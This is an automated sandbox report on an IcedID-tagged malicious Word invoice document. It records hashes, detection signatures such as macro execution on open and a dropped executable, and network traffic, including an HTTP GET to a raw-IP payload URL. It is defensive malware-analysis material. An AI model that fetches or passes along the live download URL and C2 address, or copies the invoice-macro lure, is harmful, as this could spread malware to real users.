Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
wpswireless-invoice-08.11.22.doc

Overview

General Information

Sample Name:wpswireless-invoice-08.11.22.doc
Analysis ID:682568
MD5:672ff75cfa223733b4d42382089a57b2
SHA1:02dd6b448c2373dc1223724b1ab1aff920528aa6
SHA256:aabc9295e27a673dcfb902960b8196a561923cef78ddb061956cb627fcfa782c
Tags:docIcedID
Infos:

Detection

Score:92
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Document exploit detected (drops PE files)
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (creates forbidden files)
Office process drops PE file
Machine Learning detection for sample
Document contains an embedded VBA macro with suspicious strings
Document exploit detected (process start blacklist hit)
Document exploit detected (UrlDownloadToFile)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Contains functionality to call native functions
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Document misses a certain OLE stream usually present in this Microsoft Office document type
Potential document exploit detected (unknown TCP traffic)
PE file contains strange resources
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Document contains embedded VBA macros
Dropped file seen in connection with other malware
Potential document exploit detected (performs HTTP gets)

Classification

  • System is w10x64
  • WINWORD.EXE (PID: 5352 cmdline: "C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /Automation -Embedding MD5: 0B9AB9B9C4DE429473D6450D4297A123)
    • r3F3.tmp.exe (PID: 1992 cmdline: "C:\Users\user\AppData\Local\Temp\r3F3.tmp.exe" "C:\Users\user\AppData\Local\Temp\y133.tmp.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Snort rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: wpswireless-invoice-08.11.22.docReversingLabs: Detection: 15%
Source: wpswireless-invoice-08.11.22.docJoe Sandbox ML: detected
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dll
Source: Binary string: rundll32.pdb source: r3F3.tmp.exe, r3F3.tmp.exe, 00000003.00000000.285193260.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, r3F3.tmp.exe.0.dr
Source: Binary string: rundll32.pdbGCTL source: r3F3.tmp.exe, 00000003.00000000.285193260.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, r3F3.tmp.exe.0.dr

Software Vulnerabilities

barindex
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile created: r3F3.tmp.exe.0.drJump to dropped file
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\y133.tmp.dllJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\r3F3.tmp.exeJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess created: C:\Users\user\AppData\Local\Temp\r3F3.tmp.exe
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXESection loaded: unknown origin: URLDownloadToFileA
Source: global trafficTCP traffic: 192.168.2.3:49741 -> 45.8.146.139:80
Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.3:49741
Source: global trafficTCP traffic: 192.168.2.3:49741 -> 45.8.146.139:80
Source: global trafficTCP traffic: 192.168.2.3:49741 -> 45.8.146.139:80
Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.3:49741
Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.3:49741
Source: global trafficTCP traffic: 192.168.2.3:49741 -> 45.8.146.139:80
Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.3:49741
Source: global trafficTCP traffic: 192.168.2.3:49741 -> 45.8.146.139:80
Source: global trafficTCP traffic: 192.168.2.3:49741 -> 45.8.146.139:80
Source: global trafficTCP traffic: 192.168.2.3:49741 -> 45.8.146.139:80
Source: global trafficTCP traffic: 192.168.2.3:49741 -> 45.8.146.139:80
Source: global trafficTCP traffic: 192.168.2.3:49741 -> 45.8.146.139:80
Source: global trafficTCP traffic: 192.168.2.3:49741 -> 45.8.146.139:80
Source: global trafficTCP traffic: 192.168.2.3:49741 -> 45.8.146.139:80
Source: global trafficTCP traffic: 192.168.2.3:49741 -> 45.8.146.139:80
Source: global trafficTCP traffic: 192.168.2.3:49741 -> 45.8.146.139:80
Source: winword.exeMemory has grown: Private usage: 0MB later: 76MB
Source: Joe Sandbox ViewIP Address: 45.8.146.139 45.8.146.139
Source: global trafficHTTP traffic detected: GET /fhfty/_C45V3_-S5YKINT86D3PPVX0ILQLA-SG/rm HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 45.8.146.139Connection: Keep-Alive
Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
Source: r3F3.tmp.exe, 00000003.00000002.298547030.0000000002BA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.8.146.139/fhfty/_C45V3_-S5YKINT86D3PPVX0ILQLA-SG/rm
Source: r3F3.tmp.exe, 00000003.00000002.298547030.0000000002BA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.8.146.139/fhfty/_C45V3_-S5YKINT86D3PPVX0ILQLA-SG/rmP
Source: r3F3.tmp.exe, 00000003.00000002.298513793.0000000002890000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.8.146.139/fhfty/_C45V3_-S5YKINT86D3PPVX0ILQLA-SG/rmYKINT86D3PPVX0ILQLA-SG/rmG/rmG/rm
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: http://b.c2r.ts.cdn.office.net/pr
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: http://weather.service.msn.com/data.aspx
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://addinsinstallation.store.office.com/app/acquisitionlogging
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://addinsinstallation.store.office.com/app/download
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/authenticated
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/unauthenticated
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://addinsinstallation.store.office.com/orgid/appinstall/authenticated
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://addinslicensing.store.office.com/apps/remove
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://addinslicensing.store.office.com/commerce/query
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://addinslicensing.store.office.com/entitlement/query
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://addinslicensing.store.office.com/orgid/apps/remove
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://addinslicensing.store.office.com/orgid/entitlement/query
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://analysis.windows.net/powerbi/api
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://api.aadrm.com
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://api.aadrm.com/
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://api.addins.store.office.com/addinstemplate
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://api.addins.store.office.com/app/query
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://api.addins.store.officeppe.com/addinstemplate
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://api.cortana.ai
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://api.diagnostics.office.com
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://api.diagnosticssdf.office.com
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://api.diagnosticssdf.office.com/v2/feedback
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://api.diagnosticssdf.office.com/v2/file
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://api.microsoftstream.com/api/
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://api.office.net
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://api.onedrive.com
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://apis.live.net/v5.0/
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://augloop.office.com
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://augloop.office.com/v2
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://autodiscover-s.outlook.com/
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://cdn.entity.
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://clients.config.office.net/
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://clients.config.office.net/c2r/v1.0/InteractiveInstallation
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://config.edge.skype.com
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://cortana.ai
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://cortana.ai/api
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://cr.office.com
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://dataservice.o365filtering.com
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://dataservice.o365filtering.com/
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://dev.cortana.ai
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://devnull.onenote.com
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://directory.services.
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://enrichment.osi.office.net/
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Refresh/v1
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Resolve/v1
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Search/v1
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/StockHistory/v1
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/ipcheck/v1
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/metadata.json
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/desktop/main.cshtml
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/web/main.cshtml
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://graph.ppe.windows.net
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://graph.ppe.windows.net/
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://graph.windows.net
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://graph.windows.net/
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?secureurl=1
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://incidents.diagnostics.office.com
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://inclient.store.office.com/gyro/client
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://inclient.store.office.com/gyro/clientstore
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://invites.office.com/
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/Getvoices
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://lifecycle.office.com
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://login.microsoftonline.com/
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://login.windows.local
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://management.azure.com
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://management.azure.com/
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://messaging.action.office.com/
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://messaging.action.office.com/setcampaignaction
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://messaging.action.office.com/setuseraction16
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://messaging.engagement.office.com/
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://messaging.engagement.office.com/campaignmetadataaggregator
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://messaging.lifecycle.office.com/
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://messaging.lifecycle.office.com/getcustommessage16
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://messaging.office.com/
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://metadata.templates.cdn.office.net/client/log
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://my.microsoftpersonalcontent.com
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://ncus.contentsync.
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://ncus.pagecontentsync.
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://officeapps.live.com
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentities
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentitiesupdated
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://onedrive.live.com
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://onedrive.live.com/embed?
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://osi.office.net
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://otelrules.azureedge.net
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://outlook.office.com
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://outlook.office.com/
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://outlook.office365.com
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://outlook.office365.com/
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://pages.store.office.com/review/query
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
